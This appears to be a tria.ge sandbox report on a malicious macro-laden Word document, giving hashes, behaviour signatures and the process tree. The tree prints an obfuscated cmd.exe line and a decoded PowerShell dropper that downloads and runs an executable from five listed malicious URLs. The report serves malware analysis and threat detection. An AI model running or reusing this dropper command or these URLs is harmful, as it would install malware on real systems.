Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    26/05/2024, 21:49

General

  • Target

    76e3f55356e2a30593d436ab0880eff8_JaffaCakes118.doc

  • Size

    113KB

  • MD5

    76e3f55356e2a30593d436ab0880eff8

  • SHA1

    6b1725b71bf2f01ca5b6b7f4c2b4252c67a6e2b1

  • SHA256

    b76296d33b324195937257e98ff545fa525399c3f54ec9ed090e29a09ea87e5e

  • SHA512

    6d4e48af3634cea0c8f729a171c51b65cb8b9755cf173867cf201a6934a771a315cb3540c0bcd5f47a58ca200fa0d05a052fbf1313717debb7ca5ccf192cfa8c

  • SSDEEP

    1536:0TxjwKZ09cB7y9ghN8+mQ90MTT+aU1E0NpFukKH6FH:4xjnB29gb8on+E0NpFEaFH

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://baza-shartash.ru/hkqXqT1

exe.dropper

http://anapapoliv.ru/Sp4na

exe.dropper

http://shorecrestschools.com/nnQkN

exe.dropper

http://comicole.com/2HZ

exe.dropper

http://elartedelaaccion.es/6Hyl

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\76e3f55356e2a30593d436ab0880eff8_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1988
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2620
      • C:\Windows\SysWOW64\Cmd.exe
        Cmd /V:O/C"set - =IdBSZaVlEVEJwpRGpMcXUSahlErhlBwsz 7+Wi;mN9qC.@,\Pk}tQb'j26=oT)fDy:/nue{F4Hv1$(-x&&for %o in (16,59,30,69,26,31,27,69,28,28,33,76,53,37,59,58,67,69,30,78,59,53,55,69,18,51,33,40,69,51,44,36,69,53,43,28,37,69,67,51,38,76,26,67,9,58,54,27,51,51,16,65,66,66,53,22,32,22,78,31,27,22,26,51,22,31,27,44,26,68,66,27,49,42,19,42,60,75,45,27,51,51,16,65,66,66,22,67,22,16,22,16,59,28,37,74,44,26,68,66,21,16,72,67,22,45,27,51,51,16,65,66,66,31,27,59,26,69,18,26,69,31,51,31,18,27,59,59,28,31,44,18,59,39,66,67,67,52,49,40,45,27,51,51,16,65,66,66,18,59,39,37,18,59,28,69,44,18,59,39,66,56,73,4,45,27,51,51,16,65,66,66,69,28,22,26,51,69,1,69,28,22,22,18,18,37,59,67,44,69,31,66,57,73,64,28,54,44,21,16,28,37,51,77,54,45,54,61,38,76,68,42,43,33,58,33,54,75,34,41,54,38,76,68,31,51,58,76,69,67,74,65,51,69,39,16,35,54,47,54,35,76,68,42,43,35,54,44,69,79,69,54,38,62,59,26,69,22,18,27,77,76,67,25,14,33,37,67,33,76,26,67,9,61,70,51,26,64,70,76,53,37,59,44,63,59,30,67,28,59,22,1,71,37,28,69,77,76,67,25,14,46,33,76,68,31,51,61,38,21,51,22,26,51,78,48,26,59,18,69,31,31,33,76,68,31,51,38,53,26,69,22,49,38,50,18,22,51,18,27,70,50,50,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,88)do set ] =!] !!- :~%o,1!&&if %o==88 call %] :~-360%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2828
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $bio=new-object Net.WebClient;$rnV='http://baza-shartash.ru/hkqXqT1@http://anapapoliv.ru/Sp4na@http://shorecrestschools.com/nnQkN@http://comicole.com/2HZ@http://elartedelaaccion.es/6Hyl'.Split('@');$uqC = '179';$ust=$env:temp+'\'+$uqC+'.exe';foreach($nER in $rnV){try{$bio.DownloadFile($nER, $ust);Start-Process $ust;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2188

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      a1820d09706007b1b49d661b51446fc6

      SHA1

      b8cdd267a03bf2b9006f076cbf909ddedf86e831

      SHA256

      a76718cdc20087ef840d58865ed2720bc5e0c524f4546a389e87fde9391efe2a

      SHA512

      9d002c85b8c8d0d675af1e5eb4e3c7d1fa45d0aabf59615e98701757b188faab843dceadaaa179b15e9c245c2d8333ab404a0f18bdff3fe2ecaebaacbd253f34

    • memory/1988-9-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-18-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-6-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-7-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-68-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-16-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-15-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-14-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-13-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-12-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-17-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-11-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-2-0x00000000711AD000-0x00000000711B8000-memory.dmp

      Filesize

      44KB

    • memory/1988-10-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-8-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-60-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-86-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-85-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-56-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-43-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-42-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-51-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-34-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-0-0x000000002FF11000-0x000000002FF12000-memory.dmp

      Filesize

      4KB

    • memory/1988-98-0x00000000711AD000-0x00000000711B8000-memory.dmp

      Filesize

      44KB

    • memory/1988-99-0x00000000002B0000-0x00000000003B0000-memory.dmp

      Filesize

      1024KB

    • memory/1988-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1988-115-0x00000000711AD000-0x00000000711B8000-memory.dmp

      Filesize

      44KB